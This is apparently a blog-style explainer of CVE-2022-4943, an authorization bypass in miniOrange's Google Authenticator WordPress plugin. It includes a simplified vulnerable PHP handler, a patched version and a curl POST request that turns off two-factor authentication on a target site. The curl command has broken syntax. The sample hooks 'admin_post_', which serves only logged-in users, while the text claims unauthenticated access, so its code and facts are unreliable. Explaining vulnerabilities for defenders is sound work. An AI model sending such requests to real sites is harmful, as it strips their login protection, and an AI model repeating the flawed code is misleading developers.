CVE CyberSecurity Database News

CVE-2022-4943 - How a Serious Flaw in miniOrange’s Google Authenticator Plugin Let Attackers Bypass Authorization

Poster -

If you are running a WordPress website, chances are you care about security. Maybe you even opted for a two-factor authentication plugin like miniOrange’s Google Authenticator. Unfortunately, versions of this plugin up to and including 5.6.5 had a critical vulnerability: CVE-2022-4943. This flaw allowed attackers to change plugin settings without being logged in—defeating the whole purpose of extra security!

In this article, I’ll break down how this happened, show you the vulnerable code, walk you through a possible exploit, and direct you to original resources. No jargon, just straight talk and simple examples.

What Is CVE-2022-4943 All About?

CVE-2022-4943 is a missing capability check vulnerability in the miniOrange Google Authenticator plugin. That basically means the plugin forgot to make sure a user was an admin (or even logged in!) before letting them change important settings.

This flaw, present in all plugin versions up to 5.6.5, made it possible for an unauthenticated attacker to change things like enabling/disabling two-factor auth—putting your entire site at risk.

How Did This Happen? Show Me the Code!

WordPress uses capabilities to make sure only certain users can perform sensitive actions. Let’s look at a simplified, real-world example from the miniOrange plugin.

function save_mo2fa_settings() {
    // This function saves plugin settings
    
    // Vulnerable: No check for user capabilities
    if ($_POST['action'] === 'save_settings') {
        update_option('mo2fa_enable', $_POST['mo2fa_enable']);
        // ... update other settings
    }
}

add_action('admin_post_mo2fa_save_settings', 'save_mo2fa_settings');

Looks harmless, right? The problem: There’s no current_user_can('manage_options') check here. That means anyone who can trigger this function—even without logging in!—can change your plugin’s security settings.

A secure version should look like this

function save_mo2fa_settings() {
    if (!current_user_can('manage_options')) {
        // Not an admin, block access
        wp_die('Unauthorized user');
    }
    if ($_POST['action'] === 'save_settings') {
        update_option('mo2fa_enable', $_POST['mo2fa_enable']);
        // ... update other settings
    }
}

How Could an Attacker Exploit This?

An attacker can simply submit a POST request to the vulnerable endpoint—even without logging in—to change your settings.

Suppose the plugin listens for changes at /wp-admin/admin-post.php

curl -X POST "https://yourwebsite.com/wp-admin/admin-post.php"; ^
  --data "action=mo2fa_save_settings" ^
  --data "mo2fa_enable="

This disables the Google Authenticator for all users. Nasty!

Other settings can be changed just as easily, depending on what the plugin exposes.

References and Resources

- Wordfence Security Advisory for CVE-2022-4943
- Official CVE entry
- miniOrange Google Authenticator plugin page

Conclusion

CVE-2022-4943 shows how forgetting a single line of code can open the door to attackers. Always check user capabilities on sensitive actions—especially when writing for WordPress. If you use miniOrange’s Google Authenticator, update now, and tell your friends who do the same!

Timeline

Published on: 10/20/2023 08:15:00 UTC
Last modified on: 11/07/2023 03:59:00 UTC